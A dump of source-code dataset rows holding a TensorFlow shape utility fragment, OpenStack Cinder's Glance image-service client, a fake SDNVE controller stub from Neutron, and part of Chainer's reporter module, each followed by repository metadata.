_flip_vector_to_matrix(vec, [2, 3, 4], [2, 3, 4]) # Shape [2, 3, 4, 5, 1]
# Flip leading dimension to the end and reshape the batch indices to
# batch_shape.
_flip_vector_to_matrix(vec, [4, 3], [4, 3]) # Shape [4, 3, 5, 2]
```
Suppose `batch_shape` is length `n`. Then...
Given `vec.shape = [M1,...,Mm] + [N1,...,Nn] + [k]`, for some
`m > 0` we reshape to a batch matrix with shape `batch_shape + [k, M]`
where `M = M1*...*Mm`. This is done by "flipping" the leading dimensions to
the end and possibly reshaping `[N1,...,Nn]` to `batch_shape`.
In the case `vec.shape = [N1,...,Nn] + [k]`, we reshape to
`batch_shape + [k, 1]` by extending the tensor with a singleton dimension and
possibly reshaping `[N1,...,Nn]` to `batch_shape`.
See also: _flip_matrix_to_vector.
Args:
vec: `Tensor` with shape `[M1,...,Mm] + [N1,...,Nn] + [k]`
batch_shape: `int32` `Tensor`.
static_batch_shape: `TensorShape` with statically determined batch shape.
Returns:
`Tensor` with same `dtype` as `vec` and new shape.
"""
vec = ops.convert_to_tensor(vec, name='vec')
if (
vec.get_shape().is_fully_defined()
and static_batch_shape.is_fully_defined()):
return _flip_vector_to_matrix_static(vec, static_batch_shape)
else:
return _flip_vector_to_matrix_dynamic(vec, batch_shape)
def _flip_vector_to_matrix_dynamic(vec, batch_shape):
"""_flip_vector_to_matrix with dynamic shapes."""
# Shapes associated with batch_shape
batch_rank = array_ops.size(batch_shape)
# Shapes associated with vec.
vec = ops.convert_to_tensor(vec, name='vec')
vec_shape = array_ops.shape(vec)
vec_rank = array_ops.rank(vec)
vec_batch_rank = vec_rank - 1
m = vec_batch_rank - batch_rank
# vec_shape_left = [M1,...,Mm] or [].
vec_shape_left = array_ops.slice(vec_shape, [0], [m])
# If vec_shape_left = [], then condensed_shape = [1] since reduce_prod([]) = 1
# If vec_shape_left = [M1,...,Mm], condensed_shape = [M1*...*Mm]
condensed_shape = [math_ops.reduce_prod(vec_shape_left)]
k = array_ops.gather(vec_shape, vec_rank - 1)
new_shape = array_ops.concat(0, (batch_shape, [k], condensed_shape))
def _flip_front_dims_to_back():
# Permutation corresponding to [N1,...,Nn] + [k, M1,...,Mm]
perm = array_ops.concat(
0, (math_ops.range(m, vec_rank), math_ops.range(0, m)))
return array_ops.transpose(vec, perm=perm)
x_flipped = control_flow_ops.cond(
math_ops.less(0, m),
_flip_front_dims_to_back,
lambda: array_ops.expand_dims(vec, -1))
return array_ops.reshape(x_flipped, new_shape)
def _flip_vector_to_matrix_static(vec, batch_shape):
"""_flip_vector_to_matrix with static shapes."""
# Shapes associated with batch_shape
batch_rank = batch_shape.ndims
# Shapes associated with vec.
vec = ops.convert_to_tensor(vec, name='vec')
vec_shape = vec.get_shape()
vec_rank = len(vec_shape)
vec_batch_rank = vec_rank - 1
m = vec_batch_rank - batch_rank
# vec_shape_left = [M1,...,Mm] or [].
vec_shape_left = vec_shape[:m]
# If vec_shape_left = [], then condensed_shape = [1] since reduce_prod([]) = 1
# If vec_shape_left = [M1,...,Mm], condensed_shape = [M1*...*Mm]
condensed_shape = [np.prod(vec_shape_left)]
k = vec_shape[-1]
new_shape = batch_shape.concatenate(k).concatenate(condensed_shape)
def _flip_front_dims_to_back():
# Permutation corresponding to [N1,...,Nn] + [k, M1,...,Mm]
perm = array_ops.concat(
0, (math_ops.range(m, vec_rank), math_ops.range(0, m)))
return array_ops.transpose(vec, perm=perm)
if 0 < m:
x_flipped = _flip_front_dims_to_back()
else:
x_flipped = array_ops.expand_dims(vec, -1)
return array_ops.reshape(x_flipped, new_shape)
def _extract_batch_shape(x, num_event_dims, name='extract_batch_shape'):
"""Extract the batch shape from `x`.
Assuming `x.shape = batch_shape + event_shape`, when `event_shape` has
`num_event_dims` dimensions. This `Op` returns the batch shape `Tensor`.
Args:
x: `Tensor` with rank at least `num_event_dims`. If rank is not high enough
this `Op` will fail.
num_event_dims: `int32` scalar `Tensor`. The number of trailing dimensions
in `x` to be considered as part of `event_shape`.
name: A name to prepend to created `Ops`.
Returns:
batch_shape: `1-D` `int32` `Tensor`
"""
with ops.name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name='x')
return array_ops.slice(
array_ops.shape(x), [0], [array_ops.rank(x) - num_event_dims])
| apache-2.0 | -9,187,433,578,970,137,000 | 34.741191 | 80 | 0.637702 | false |
Nexenta/cinder | cinder/image/glance.py | 2 | 24387 | # Copyright 2010 OpenStack Foundation
# Copyright 2013 NTT corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of an image service that uses Glance as the backend"""
from __future__ import absolute_import
import copy
import itertools
import random
import shutil
import sys
import time
import glanceclient.exc
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
import six
from six.moves import range
from six.moves import urllib
from cinder import exception
from cinder.i18n import _, _LE
glance_opts = [
cfg.ListOpt('allowed_direct_url_schemes',
default=[],
help='A list of url schemes that can be downloaded directly '
'via the direct_url. Currently supported schemes: '
'[file].'),
cfg.StrOpt('glance_catalog_info',
default='image:glance:publicURL',
help='Info to match when looking for glance in the service '
'catalog. Format is: separated values of the form: '
'<service_type>:<service_name>:<endpoint_type> - '
'Only used if glance_api_servers are not provided.'),
]
glance_core_properties_opts = [
cfg.ListOpt('glance_core_properties',
default=['checksum', 'container_format',
'disk_format', 'image_name', 'image_id',
'min_disk', 'min_ram', 'name', 'size'],
help='Default core properties of image')
]
CONF = cfg.CONF
CONF.register_opts(glance_opts)
CONF.register_opts(glance_core_properties_opts)
CONF.import_opt('glance_api_version', 'cinder.common.config')
LOG = logging.getLogger(__name__)
def _parse_image_ref(image_href):
"""Parse an image href into composite parts.
:param image_href: href of an image
:returns: a tuple of the form (image_id, netloc, use_ssl)
:raises ValueError
"""
url = urllib.parse.urlparse(image_href)
netloc = url.netloc
image_id = url.path.split('/')[-1]
use_ssl = (url.scheme == 'https')
return (image_id, netloc, use_ssl)
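# Illustrative example (not part of the original module); the href below is
# hypothetical:
#
#   >>> _parse_image_ref(
#   ...     'https://glance.example.com:9292/v2/images/b8b2c6f7-7345')
#   ('b8b2c6f7-7345', 'glance.example.com:9292', True)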
def _create_glance_client(context, netloc, use_ssl, version=None):
"""Instantiate a new glanceclient.Client object."""
if version is None:
version = CONF.glance_api_version
params = {}
if use_ssl:
scheme = 'https'
# https specific params
params['insecure'] = CONF.glance_api_insecure
params['ssl_compression'] = CONF.glance_api_ssl_compression
params['cacert'] = CONF.glance_ca_certificates_file
else:
scheme = 'http'
if CONF.auth_strategy == 'keystone':
params['token'] = context.auth_token
if CONF.glance_request_timeout is not None:
params['timeout'] = CONF.glance_request_timeout
endpoint = '%s://%s' % (scheme, netloc)
return glanceclient.Client(str(version), endpoint, **params)
def get_api_servers(context):
"""Return Iterable over shuffled api servers.
Shuffle a list of glance_api_servers and return an iterator
that will cycle through the list, looping around to the beginning
if necessary. If CONF.glance_api_servers is None then they will
be retrieved from the catalog.
"""
api_servers = []
api_servers_info = []
if CONF.glance_api_servers is None:
info = CONF.glance_catalog_info
try:
service_type, service_name, endpoint_type = info.split(':')
except ValueError:
raise exception.InvalidConfigurationValue(_(
"Failed to parse the configuration option "
"'glance_catalog_info', must be in the form "
"<service_type>:<service_name>:<endpoint_type>"))
for entry in context.service_catalog:
if entry.get('type') == service_type:
api_servers.append(
entry.get('endpoints')[0].get(endpoint_type))
else:
for api_server in CONF.glance_api_servers:
api_servers.append(api_server)
for api_server in api_servers:
if '//' not in api_server:
api_server = 'http://' + api_server
url = urllib.parse.urlparse(api_server)
netloc = url.netloc + url.path
use_ssl = (url.scheme == 'https')
api_servers_info.append((netloc, use_ssl))
random.shuffle(api_servers_info)
return itertools.cycle(api_servers_info)
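# Hedged usage sketch (not part of the original module): the returned iterator
# cycles endlessly, so callers pull one (netloc, use_ssl) pair per attempt.
#
#   servers = get_api_servers(context)  # 'context' is assumed to be available
#   netloc, use_ssl = next(servers)
#   client = _create_glance_client(context, netloc, use_ssl)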
class GlanceClientWrapper(object):
"""Glance client wrapper class that implements retries."""
def __init__(self, context=None, netloc=None, use_ssl=False,
version=None):
if netloc is not None:
self.client = self._create_static_client(context,
netloc,
use_ssl, version)
else:
self.client = None
self.api_servers = None
self.version = version
def _create_static_client(self, context, netloc, use_ssl, version):
"""Create a client that we'll use for every call."""
self.netloc = netloc
self.use_ssl = use_ssl
self.version = version
return _create_glance_client(context,
self.netloc,
self.use_ssl, self.version)
def _create_onetime_client(self, context, version):
"""Create a client that will be used for one call."""
if self.api_servers is None:
self.api_servers = get_api_servers(context)
self.netloc, self.use_ssl = next(self.api_servers)
return _create_glance_client(context,
self.netloc,
self.use_ssl, version)
def call(self, context, method, *args, **kwargs):
"""Call a glance client method.
If we get a connection error,
retry the request according to CONF.glance_num_retries.
"""
version = kwargs.pop('version', self.version)
retry_excs = (glanceclient.exc.ServiceUnavailable,
glanceclient.exc.InvalidEndpoint,
glanceclient.exc.CommunicationError)
num_attempts = 1 + CONF.glance_num_retries
for attempt in range(1, num_attempts + 1):
client = self.client or self._create_onetime_client(context,
version)
try:
controller = getattr(client,
kwargs.pop('controller', 'images'))
return getattr(controller, method)(*args, **kwargs)
except retry_excs as e:
netloc = self.netloc
extra = "retrying"
error_msg = _LE("Error contacting glance server "
"'%(netloc)s' for '%(method)s', "
"%(extra)s.")
if attempt == num_attempts:
extra = 'done trying'
LOG.exception(error_msg, {'netloc': netloc,
'method': method,
'extra': extra})
raise exception.GlanceConnectionFailed(reason=e)
LOG.exception(error_msg, {'netloc': netloc,
'method': method,
'extra': extra})
time.sleep(1)
except glanceclient.exc.HTTPOverLimit as e:
raise exception.ImageLimitExceeded(e)
class GlanceImageService(object):
"""Provides storage and retrieval of disk image objects within Glance."""
def __init__(self, client=None):
self._client = client or GlanceClientWrapper()
self._image_schema = None
self.temp_images = None
def detail(self, context, **kwargs):
"""Calls out to Glance for a list of detailed image information."""
params = self._extract_query_params(kwargs)
try:
images = self._client.call(context, 'list', **params)
except Exception:
_reraise_translated_exception()
_images = []
for image in images:
if self._is_image_available(context, image):
_images.append(self._translate_from_glance(context, image))
return _images
def _extract_query_params(self, params):
_params = {}
accepted_params = ('filters', 'marker', 'limit',
'sort_key', 'sort_dir')
for param in accepted_params:
if param in params:
_params[param] = params.get(param)
# NOTE(geguileo): We set is_public default value for v1 because we want
# to retrieve all images by default. We don't need to send v2
        # equivalent - "visibility" - because its default value when omitted is
# "public, private, shared", which will return all.
if CONF.glance_api_version <= 1:
# ensure filters is a dict
_params.setdefault('filters', {})
# NOTE(vish): don't filter out private images
_params['filters'].setdefault('is_public', 'none')
return _params
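    # Hedged example of the filtering above (values are hypothetical): with
    # glance_api_version <= 1, an input of {'limit': 10, 'marker': 'abc',
    # 'foo': 'bar'} yields
    # {'limit': 10, 'marker': 'abc', 'filters': {'is_public': 'none'}};
    # unknown keys such as 'foo' are silently dropped.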
def show(self, context, image_id):
"""Returns a dict with image data for the given opaque image id."""
try:
image = self._client.call(context, 'get', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if not self._is_image_available(context, image):
raise exception.ImageNotFound(image_id=image_id)
base_image_meta = self._translate_from_glance(context, image)
return base_image_meta
def get_location(self, context, image_id):
"""Get backend storage location url.
Returns a tuple containing the direct url and locations representing
the backend storage location, or (None, None) if these attributes are
not shown by Glance.
"""
if CONF.glance_api_version == 1:
# image location not available in v1
return (None, None)
try:
# direct_url is returned by v2 api
client = GlanceClientWrapper(version=2)
image_meta = client.call(context, 'get', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if not self._is_image_available(context, image_meta):
raise exception.ImageNotFound(image_id=image_id)
        # For some glance stores (e.g. nfs), only metadata is stored and
        # returned as locations, so a composite of the two needs to be
        # returned.
return (getattr(image_meta, 'direct_url', None),
getattr(image_meta, 'locations', None))
def add_location(self, context, image_id, url, metadata):
"""Add a backend location url to an image.
Returns a dict containing image metadata on success.
"""
if CONF.glance_api_version != 2:
raise exception.Invalid("Image API version 2 is disabled.")
client = GlanceClientWrapper(version=2)
try:
return client.call(context, 'add_location',
image_id, url, metadata)
except Exception:
_reraise_translated_image_exception(image_id)
def download(self, context, image_id, data=None):
"""Calls out to Glance for data and writes data."""
if data and 'file' in CONF.allowed_direct_url_schemes:
direct_url, locations = self.get_location(context, image_id)
urls = [direct_url] + [loc.get('url') for loc in locations or []]
for url in urls:
if url is None:
continue
parsed_url = urllib.parse.urlparse(url)
if parsed_url.scheme == "file":
# a system call to cp could have significant performance
# advantages, however we do not have the path to files at
# this point in the abstraction.
with open(parsed_url.path, "r") as f:
shutil.copyfileobj(f, data)
return
try:
image_chunks = self._client.call(context, 'data', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if not data:
return image_chunks
else:
for chunk in image_chunks:
data.write(chunk)
def create(self, context, image_meta, data=None):
"""Store the image data and return the new image object."""
sent_service_image_meta = self._translate_to_glance(image_meta)
if data:
sent_service_image_meta['data'] = data
recv_service_image_meta = self._client.call(context, 'create',
**sent_service_image_meta)
return self._translate_from_glance(context, recv_service_image_meta)
def update(self, context, image_id,
image_meta, data=None, purge_props=True):
"""Modify the given image with the new data."""
image_meta = self._translate_to_glance(image_meta)
# NOTE(dosaboy): see comment in bug 1210467
if CONF.glance_api_version == 1:
image_meta['purge_props'] = purge_props
# NOTE(bcwaldon): id is not an editable field, but it is likely to be
# passed in by calling code. Let's be nice and ignore it.
image_meta.pop('id', None)
if data:
image_meta['data'] = data
try:
# NOTE(dosaboy): the v2 api separates update from upload
if data and CONF.glance_api_version > 1:
self._client.call(context, 'upload', image_id, data)
image_meta = self._client.call(context, 'get', image_id)
else:
image_meta = self._client.call(context, 'update', image_id,
**image_meta)
except Exception:
_reraise_translated_image_exception(image_id)
else:
return self._translate_from_glance(context, image_meta)
def delete(self, context, image_id):
"""Delete the given image.
:raises: ImageNotFound if the image does not exist.
:raises: NotAuthorized if the user is not an owner.
"""
try:
self._client.call(context, 'delete', image_id)
except glanceclient.exc.NotFound:
raise exception.ImageNotFound(image_id=image_id)
return True
def _translate_from_glance(self, context, image):
"""Get image metadata from glance image.
        Extract metadata from the image and convert its properties
        to the types cinder expects.
:param image: glance image object
:return: image metadata dictionary
"""
if CONF.glance_api_version == 2:
if self._image_schema is None:
self._image_schema = self._client.call(context, 'get',
controller='schemas',
schema_name='image',
version=2)
            # NOTE(aarefiev): get base image properties; storing the image
            # 'schema' key is redundant, so ignore it.
image_meta = {key: getattr(image, key)
for key in image.keys()
if self._image_schema.is_base_property(key) is True
and key != 'schema'}
            # NOTE(aarefiev): nova expects all image properties
            # (custom or defined in schema-image.json) to be stored in the
            # 'properties' key.
image_meta['properties'] = {
key: getattr(image, key) for key in image.keys()
if self._image_schema.is_base_property(key) is False}
else:
image_meta = _extract_attributes(image)
image_meta = _convert_timestamps_to_datetimes(image_meta)
image_meta = _convert_from_string(image_meta)
return image_meta
@staticmethod
def _translate_to_glance(image_meta):
image_meta = _convert_to_string(image_meta)
image_meta = _remove_read_only(image_meta)
# NOTE(tsekiyama): From the Image API v2, custom properties must
# be stored in image_meta directly, instead of the 'properties' key.
if CONF.glance_api_version >= 2:
properties = image_meta.get('properties')
if properties:
image_meta.update(properties)
del image_meta['properties']
return image_meta
@staticmethod
def _is_image_available(context, image):
"""Check image availability.
This check is needed in case Nova and Glance are deployed
without authentication turned on.
"""
# The presence of an auth token implies this is an authenticated
# request and we need not handle the noauth use-case.
if hasattr(context, 'auth_token') and context.auth_token:
return True
if image.is_public or context.is_admin:
return True
properties = image.properties
if context.project_id and ('owner_id' in properties):
return str(properties['owner_id']) == str(context.project_id)
if context.project_id and ('project_id' in properties):
return str(properties['project_id']) == str(context.project_id)
try:
user_id = properties['user_id']
except KeyError:
return False
return str(user_id) == str(context.user_id)
def _convert_timestamps_to_datetimes(image_meta):
"""Returns image with timestamp fields converted to datetime objects."""
for attr in ['created_at', 'updated_at', 'deleted_at']:
if image_meta.get(attr):
image_meta[attr] = timeutils.parse_isotime(image_meta[attr])
return image_meta
# NOTE(bcwaldon): used to store non-string data in glance metadata
def _json_loads(properties, attr):
prop = properties[attr]
if isinstance(prop, six.string_types):
properties[attr] = jsonutils.loads(prop)
def _json_dumps(properties, attr):
prop = properties[attr]
if not isinstance(prop, six.string_types):
properties[attr] = jsonutils.dumps(prop)
_CONVERT_PROPS = ('block_device_mapping', 'mappings')
def _convert(method, metadata):
metadata = copy.deepcopy(metadata)
properties = metadata.get('properties')
if properties:
for attr in _CONVERT_PROPS:
if attr in properties:
method(properties, attr)
return metadata
def _convert_from_string(metadata):
return _convert(_json_loads, metadata)
def _convert_to_string(metadata):
return _convert(_json_dumps, metadata)
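# Illustrative round trip (not part of the original module) showing how the
# non-string properties listed in _CONVERT_PROPS are serialized; the metadata
# below is hypothetical:
#
#   meta = {'properties': {'block_device_mapping': [{'device_name': 'vda'}]}}
#   as_str = _convert_to_string(meta)
#   # as_str['properties']['block_device_mapping'] ==
#   #     '[{"device_name": "vda"}]'
#   assert _convert_from_string(as_str) == meta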
def _extract_attributes(image):
# NOTE(hdd): If a key is not found, base.Resource.__getattr__() may perform
# a get(), resulting in a useless request back to glance. This list is
# therefore sorted, with dependent attributes as the end
# 'deleted_at' depends on 'deleted'
# 'checksum' depends on 'status' == 'active'
IMAGE_ATTRIBUTES = ['size', 'disk_format', 'owner',
'container_format', 'status', 'id',
'name', 'created_at', 'updated_at',
'deleted', 'deleted_at', 'checksum',
'min_disk', 'min_ram', 'protected']
if CONF.glance_api_version == 2:
IMAGE_ATTRIBUTES.append('visibility')
else:
IMAGE_ATTRIBUTES.append('is_public')
output = {}
for attr in IMAGE_ATTRIBUTES:
if attr == 'deleted_at' and not output['deleted']:
output[attr] = None
elif attr == 'checksum' and output['status'] != 'active':
output[attr] = None
else:
output[attr] = getattr(image, attr, None)
output['properties'] = getattr(image, 'properties', {})
# NOTE(jbernard): Update image properties for API version 2. For UEC
# images stored in glance, the necessary boot information is stored in the
# properties dict in version 1 so there is nothing more to do. However, in
# version 2 these are standalone fields in the GET response. This bit of
# code moves them back into the properties dict as the caller expects, thus
# producing a volume with correct metadata for booting.
for attr in ('kernel_id', 'ramdisk_id'):
value = getattr(image, attr, None)
if value:
output['properties'][attr] = value
return output
def _remove_read_only(image_meta):
IMAGE_ATTRIBUTES = ['status', 'updated_at', 'created_at', 'deleted_at']
output = copy.deepcopy(image_meta)
for attr in IMAGE_ATTRIBUTES:
if attr in output:
del output[attr]
return output
def _reraise_translated_image_exception(image_id):
"""Transform the exception for the image but keep its traceback intact."""
_exc_type, exc_value, exc_trace = sys.exc_info()
new_exc = _translate_image_exception(image_id, exc_value)
six.reraise(type(new_exc), new_exc, exc_trace)
def _reraise_translated_exception():
"""Transform the exception but keep its traceback intact."""
_exc_type, exc_value, exc_trace = sys.exc_info()
new_exc = _translate_plain_exception(exc_value)
six.reraise(type(new_exc), new_exc, exc_trace)
def _translate_image_exception(image_id, exc_value):
if isinstance(exc_value, (glanceclient.exc.Forbidden,
glanceclient.exc.Unauthorized)):
return exception.ImageNotAuthorized(image_id=image_id)
if isinstance(exc_value, glanceclient.exc.NotFound):
return exception.ImageNotFound(image_id=image_id)
if isinstance(exc_value, glanceclient.exc.BadRequest):
return exception.Invalid(exc_value)
return exc_value
def _translate_plain_exception(exc_value):
if isinstance(exc_value, (glanceclient.exc.Forbidden,
glanceclient.exc.Unauthorized)):
return exception.NotAuthorized(exc_value)
if isinstance(exc_value, glanceclient.exc.NotFound):
return exception.NotFound(exc_value)
if isinstance(exc_value, glanceclient.exc.BadRequest):
return exception.Invalid(exc_value)
return exc_value
def get_remote_image_service(context, image_href):
"""Create an image_service and parse the id from the given image_href.
The image_href param can be an href of the form
'http://example.com:9292/v1/images/b8b2c6f7-7345-4e2f-afa2-eedaba9cbbe3',
or just an id such as 'b8b2c6f7-7345-4e2f-afa2-eedaba9cbbe3'. If the
image_href is a standalone id, then the default image service is returned.
:param image_href: href that describes the location of an image
:returns: a tuple of the form (image_service, image_id)
"""
# NOTE(bcwaldon): If image_href doesn't look like a URI, assume its a
# standalone image ID
if '/' not in str(image_href):
image_service = get_default_image_service()
return image_service, image_href
try:
(image_id, glance_netloc, use_ssl) = _parse_image_ref(image_href)
glance_client = GlanceClientWrapper(context=context,
netloc=glance_netloc,
use_ssl=use_ssl)
except ValueError:
raise exception.InvalidImageRef(image_href=image_href)
image_service = GlanceImageService(client=glance_client)
return image_service, image_id
def get_default_image_service():
return GlanceImageService()
| apache-2.0 | 3,188,328,500,356,321,000 | 37.404724 | 79 | 0.594046 | false |
zhhf/charging | charging/plugins/ibm/sdnve_api_fake.py | 19 | 2081 | # Copyright 2014 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Mohammad Banikazemi, IBM Corp.
from neutron.openstack.common import log as logging
from neutron.plugins.ibm.common import constants
LOG = logging.getLogger(__name__)
HTTP_OK = 200
class FakeClient():
'''Fake Client for SDNVE controller.'''
def __init__(self, **kwargs):
LOG.info(_('Fake SDNVE controller initialized'))
def sdnve_list(self, resource, **_params):
LOG.info(_('Fake SDNVE controller: list'))
return (HTTP_OK, None)
def sdnve_show(self, resource, specific, **_params):
LOG.info(_('Fake SDNVE controller: show'))
return (HTTP_OK, None)
def sdnve_create(self, resource, body):
LOG.info(_('Fake SDNVE controller: create'))
return (HTTP_OK, None)
def sdnve_update(self, resource, specific, body=None):
LOG.info(_('Fake SDNVE controller: update'))
return (HTTP_OK, None)
def sdnve_delete(self, resource, specific):
LOG.info(_('Fake SDNVE controller: delete'))
return (HTTP_OK, None)
def sdnve_get_tenant_byid(self, id):
LOG.info(_('Fake SDNVE controller: get tenant by id'))
return id, constants.TENANT_TYPE_OF
def sdnve_check_and_create_tenant(self, id, network_type=None):
LOG.info(_('Fake SDNVE controller: check and create tenant'))
return id
def sdnve_get_controller(self):
LOG.info(_('Fake SDNVE controller: get controller'))
return None
| apache-2.0 | -199,917,980,902,874,100 | 31.515625 | 78 | 0.663623 | false |
chainer/chainer | chainer/reporter.py | 1 | 14250 | from __future__ import absolute_import
import collections
import contextlib
import copy
import json
import threading
import typing as tp # NOQA
import warnings
import numpy
import six
import chainer
from chainer import backend
from chainer import configuration
from chainer import serializer as serializer_module
from chainer import variable
import chainerx
_thread_local = threading.local()
def _copy_variable(value):
if isinstance(value, variable.Variable):
return copy.copy(value)
return value
class Reporter(object):
"""Object to which observed values are reported.
Reporter is used to collect values that users want to watch. The reporter
object holds a mapping from value names to the actually observed values.
We call this mapping `observations`.
When a value is passed to the reporter, an object called `observer` can be
optionally attached. In this case, the name of the observer is added as the
prefix of the value name. The observer name should be registered
beforehand.
See the following example:
>>> from chainer import Reporter, report, report_scope
>>>
>>> reporter = Reporter()
>>> observer = object() # it can be an arbitrary (reference) object
>>> reporter.add_observer('my_observer', observer)
>>> observation = {}
>>> with reporter.scope(observation):
... reporter.report({'x': 1}, observer)
...
>>> observation
{'my_observer/x': 1}
    There is also a global API to add values:
>>> reporter = Reporter()
>>> observation = {}
>>> with reporter:
... with report_scope(observation):
... report({'x': 1})
...
>>> observation
{'x': 1}
The most important application of Reporter is to report observed values
from each link or chain in the training and validation procedures.
:class:`~chainer.training.Trainer` and some extensions prepare their own
Reporter object with the hierarchy of the target link registered as
observers. We can use :func:`report` function inside any links and chains
to report the observed values (e.g., training loss, accuracy, activation
statistics, etc.).
Attributes:
observation: Dictionary of observed values.
"""
def __init__(self):
self._observer_names = {}
self.observation = {}
def __enter__(self):
"""Makes this reporter object current."""
_get_reporters().append(self)
def __exit__(self, exc_type, exc_value, traceback):
"""Recovers the previous reporter object to the current."""
_get_reporters().pop()
@contextlib.contextmanager
def scope(self, observation):
"""Creates a scope to report observed values to ``observation``.
This is a context manager to be passed to ``with`` statements. In this
scope, the observation dictionary is changed to the given one.
It also makes this reporter object current.
Args:
observation (dict): Observation dictionary. All observations
reported inside of the ``with`` statement are written to this
dictionary.
"""
old = self.observation
self.observation = observation
self.__enter__()
try:
yield
finally:
self.__exit__(None, None, None)
self.observation = old
def add_observer(self, name, observer):
"""Registers an observer of values.
Observer defines a scope of names for observed values. Values observed
with the observer are registered with names prefixed by the observer
name.
Args:
name (str): Name of the observer.
observer: The observer object. Note that the reporter distinguishes
                the observers by their object ids (i.e., ``id(observer)``), rather
                than object equality.
"""
self._observer_names[id(observer)] = name
def add_observers(self, prefix, observers):
"""Registers multiple observers at once.
This is a convenient method to register multiple objects at once.
Args:
prefix (str): Prefix of each name of observers.
observers: Iterator of name and observer pairs.
"""
for name, observer in observers:
self._observer_names[id(observer)] = prefix + name
def report(self, values, observer=None):
"""Reports observed values.
The values are written with the key, prefixed by the name of the
observer object if given.
.. note::
If a value is of type :class:`~chainer.Variable`, the
variable is copied without preserving the computational graph and
the new variable object purged from the graph is stored to the
observer. This behavior can be changed by setting
``chainer.config.keep_graph_on_report`` to ``True``.
Args:
values (dict): Dictionary of observed values.
observer: Observer object. Its object ID is used to retrieve the
observer name, which is used as the prefix of the registration
name of the observed value.
"""
if not configuration.config.keep_graph_on_report:
values = {k: _copy_variable(v) for k, v in six.iteritems(values)}
if observer is not None:
observer_id = id(observer)
if observer_id not in self._observer_names:
raise KeyError(
'Given observer is not registered to the reporter.')
observer_name = self._observer_names[observer_id]
for key, value in six.iteritems(values):
name = '%s/%s' % (observer_name, key)
self.observation[name] = value
else:
self.observation.update(values)
def _get_reporters():
try:
reporters = _thread_local.reporters
except AttributeError:
reporters = _thread_local.reporters = []
return reporters
def get_current_reporter():
"""Returns the current reporter object."""
return _get_reporters()[-1]
def report(values, observer=None):
"""Reports observed values with the current reporter object.
Any reporter object can be set current by the ``with`` statement. This
function calls the :meth:`Reporter.report` method of the current reporter.
If no reporter object is current, this function does nothing.
.. admonition:: Example
The most typical example is a use within links and chains. Suppose that
a link is registered to the current reporter as an observer (for
example, the target link of the optimizer is automatically registered to
the reporter of the :class:`~chainer.training.Trainer`). We can report
some values from the link as follows::
class MyRegressor(chainer.Chain):
def __init__(self, predictor):
super(MyRegressor, self).__init__(predictor=predictor)
def __call__(self, x, y):
# This chain just computes the mean absolute and squared
# errors between the prediction and y.
pred = self.predictor(x)
abs_error = F.sum(abs(pred - y)) / len(x)
loss = F.mean_squared_error(pred, y)
# Report the mean absolute and squared errors.
chainer.report({
'abs_error': abs_error,
'squared_error': loss,
}, self)
return loss
If the link is named ``'main'`` in the hierarchy (which is the default
name of the target link in the
:class:`~chainer.training.updaters.StandardUpdater`),
these reported values are
named ``'main/abs_error'`` and ``'main/squared_error'``. If these values
are reported inside the :class:`~chainer.training.extensions.Evaluator`
extension, ``'validation/'`` is added at the head of the link name, thus
the item names are changed to ``'validation/main/abs_error'`` and
``'validation/main/squared_error'`` (``'validation'`` is the default
name of the Evaluator extension).
Args:
values (dict): Dictionary of observed values.
observer: Observer object. Its object ID is used to retrieve the
observer name, which is used as the prefix of the registration name
of the observed value.
"""
reporters = _get_reporters()
if reporters:
current = reporters[-1]
current.report(values, observer)
@contextlib.contextmanager
def report_scope(observation):
"""Returns a report scope with the current reporter.
This is equivalent to ``get_current_reporter().scope(observation)``,
except that it does not make the reporter current redundantly.
"""
current = _get_reporters()[-1]
old = current.observation
current.observation = observation
yield
current.observation = old
class Summary(object):
"""Online summarization of a sequence of scalars.
Summary computes the statistics of given scalars online.
"""
def __init__(self):
self._x = 0.0
self._x2 = 0.0
self._n = 0
def add(self, value, weight=1):
"""Adds a scalar value.
Args:
value: Scalar value to accumulate. It is either a NumPy scalar or
a zero-dimensional array (on CPU or GPU).
weight: An optional weight for the value. It is a NumPy scalar or
a zero-dimensional array (on CPU or GPU).
Default is 1 (integer).
"""
if isinstance(value, chainerx.ndarray):
            # ChainerX arrays do not support in-place assignment if they are
            # connected to the backprop graph.
value = value.as_grad_stopped()
with chainer.using_device(backend.get_device_from_array(value)):
self._x += weight * value
self._x2 += weight * value * value
self._n += weight
def compute_mean(self):
"""Computes the mean."""
x, n = self._x, self._n
with chainer.using_device(backend.get_device_from_array(x)):
return x / n
def make_statistics(self):
"""Computes and returns the mean and standard deviation values.
Returns:
tuple: Mean and standard deviation values.
"""
x, n = self._x, self._n
xp = backend.get_array_module(x)
with chainer.using_device(backend.get_device_from_array(x)):
mean = x / n
var = self._x2 / n - mean * mean
std = xp.sqrt(var)
return mean, std
def serialize(self, serializer):
try:
self._x = serializer('_x', self._x)
self._x2 = serializer('_x2', self._x2)
self._n = serializer('_n', self._n)
except KeyError:
warnings.warn('The previous statistics are not saved.')
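# --- Editor's illustrative sketch (not part of the original module) ---
# Minimal usage of Summary: accumulate a few scalars, then query the running
# mean and the (mean, std) pair. The values are arbitrary.
def _example_summary_usage():
    summary = Summary()
    for value in (1.0, 2.0, 3.0):
        summary.add(value)
    mean = summary.compute_mean()          # 2.0
    mean, std = summary.make_statistics()  # (2.0, ~0.816)
    return mean, std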
class DictSummary(object):
"""Online summarization of a sequence of dictionaries.
``DictSummary`` computes the statistics of a given set of scalars online.
It only computes the statistics for scalar values and variables of scalar
